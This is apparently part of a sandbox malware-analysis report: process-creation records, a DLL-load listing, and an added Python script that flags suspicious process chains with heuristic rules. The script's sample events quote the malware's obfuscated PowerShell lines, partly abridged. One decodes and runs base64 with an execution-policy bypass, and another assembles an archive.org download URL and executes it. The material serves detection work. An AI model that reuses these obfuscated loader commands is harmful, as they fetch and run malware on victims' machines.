Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
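The process chain recorded above (mshta.exe > cmd.exe > powershell.exe > csc.exe > cvtres.exe, then wscript.exe > powershell.exe > powershell.exe > RegAsm.exe) carries the telltales behind the report's Sigma hits: an execution-policy bypass, random casing of the PowerShell executable and its switches, [char] casts and string concatenation, the .NET compiler invoked on a file under %TEMP%, and RegAsm.exe started with no assembly argument. The Python below is an added example, not Joe Sandbox code and not a Sigma rule; it runs a handful of such checks over process-creation events constructed from the report's own "Process created" lines (the two base64 blobs and the middle of the concatenated command are abridged as "..."). The rule names are mine and the thresholds (ten concatenations, three [char] casts) are assumptions chosen to separate these lines from benign administration.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str   # parent image path ("unknown" where the report has none)
    image: str    # created image path
    cmdline: str  # created process command line


PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
NET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"

# Stage-1 payload from the report's mshta > cmd > powershell lines; the base64
# blob the report elides is abridged as "..." here as well.
PS_STAGE1 = (
    "PoWerSHELl -Ex bYPass -nOp -w 1 -C DEVIcEcRedeNTIaldeplOymeNt.eXe ; "
    "IEX($(ieX('[SYstem.TEXt.eNcODiNG]'+[char]0X3a+[CHAR]58+'uTf8.GETSTRiNG([SySTEm.COnveRt]'"
    "+[cHAR]0X3A+[CHAR]58+'fRoMbasE64StrinG('+[ChAr]0X22+'...'+[CHAr]0x22+'))')))"
)

# Constructed from the report's "Process created" lines, in order.
EVENTS = [
    ProcEvent("unknown", r"C:\Windows\SysWOW64\mshta.exe",
              r'mshta.exe "C:\Users\user\Desktop\LJ1IZDkHyE.hta"'),
    ProcEvent(r"C:\Windows\SysWOW64\mshta.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\system32\cmd.exe" "/C ' + PS_STAGE1 + '"'),
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", PS, PS_STAGE1),
    ProcEvent(PS, NET + r"\csc.exe",
              '"' + NET + r'\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\rfrvbpim\rfrvbpim.cmdline"'),
    ProcEvent(r"C:\Windows\SysWOW64\wscript.exe", PS,
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...';'''
              r'''$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));'''
              r'''powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD'''),
    ProcEvent(PS, PS,
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass '''
              r'''-NoProfile -command "('g'+'YFurl = '+'C'+'NA'+'htt'+'ps'+':/'+'/ia600100'+'.us.'+'archive.'+'org/24/'+'it'+'ems/'+...'''
              r'''+'))').rEPlaCE('CNA',[strIng][CHar]39).rEPlaCE('gYF','$') | . ( $eNV:COmspEc[4,26,25]-jOiN'')"'''),
    ProcEvent(PS, NET + r"\RegAsm.exe", '"' + NET + r'\RegAsm.exe"'),
]


def _basename_is(path: str, *names: str) -> bool:
    return path.lower().rsplit("\\", 1)[-1] in names


def case_anomaly(cmdline: str) -> bool:
    """Flag 'powershell' or a well-known switch value in random casing (PoWerSHELl, bYPass, nOp)."""
    for tok in re.findall(r"powershell|bypass|hidden|noprofile|nop", cmdline, re.I):
        if tok not in (tok.lower(), tok.upper(), tok.capitalize(), "PowerShell", "NoProfile"):
            return True
    return False


RULES = {
    "mshta_spawns_shell": lambda e: _basename_is(e.parent, "mshta.exe")
        and _basename_is(e.image, "cmd.exe", "powershell.exe"),
    "script_host_spawns_powershell": lambda e: _basename_is(e.parent, "wscript.exe", "cscript.exe")
        and _basename_is(e.image, "powershell.exe"),
    "powershell_spawns_powershell": lambda e: _basename_is(e.parent, "powershell.exe")
        and _basename_is(e.image, "powershell.exe"),
    # -Ex, -ep, -ExecutionPolicy: PowerShell accepts any unambiguous prefix.
    "execution_policy_bypass": lambda e: re.search(r"-e[a-z]*\s+bypass", e.cmdline, re.I) is not None,
    "powershell_case_anomaly": lambda e: case_anomaly(e.cmdline),
    "comspec_index_trick": lambda e: re.search(r"\$env:comspec\[", e.cmdline, re.I) is not None,
    "string_concat_obfuscation": lambda e: e.cmdline.count("'+'") >= 10,
    "char_cast_obfuscation": lambda e: len(re.findall(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", e.cmdline, re.I)) >= 3,
    "csc_compiles_from_temp": lambda e: _basename_is(e.image, "csc.exe")
        and re.search(r"\\appdata\\local\\temp\\", e.cmdline, re.I) is not None,
    # RegAsm normally takes an assembly path; a bare invocation is a hollowing target.
    "regasm_without_assembly": lambda e: _basename_is(e.image, "regasm.exe")
        and re.fullmatch(r'\s*"?[^"]*regasm\.exe"?\s*', e.cmdline, re.I) is not None,
}


def scan(events):
    """Return, per event, the sorted list of rule names it triggers."""
    return [sorted(name for name, rule in RULES.items() if rule(e)) for e in events]


if __name__ == "__main__":
    for e, hits in zip(EVENTS, scan(EVENTS)):
        child = e.image.rsplit(chr(92), 1)[-1]
        parent = e.parent.rsplit(chr(92), 1)[-1]
        print(f"{child:<15} <- {parent:<15} {', '.join(hits) or '-'}")
```

Every hop after the initial mshta.exe launch trips at least one check, and the two powershell.exe stages trip different ones (case anomaly and [char] casts on the first, concatenation and the COMSPEC index trick on the second), which is the point of layering several cheap signals rather than matching one static string. The case check deliberately whitelists the canonical spellings PowerShell and NoProfile so that ordinary scripts do not fire it.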
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe, Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exe, Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
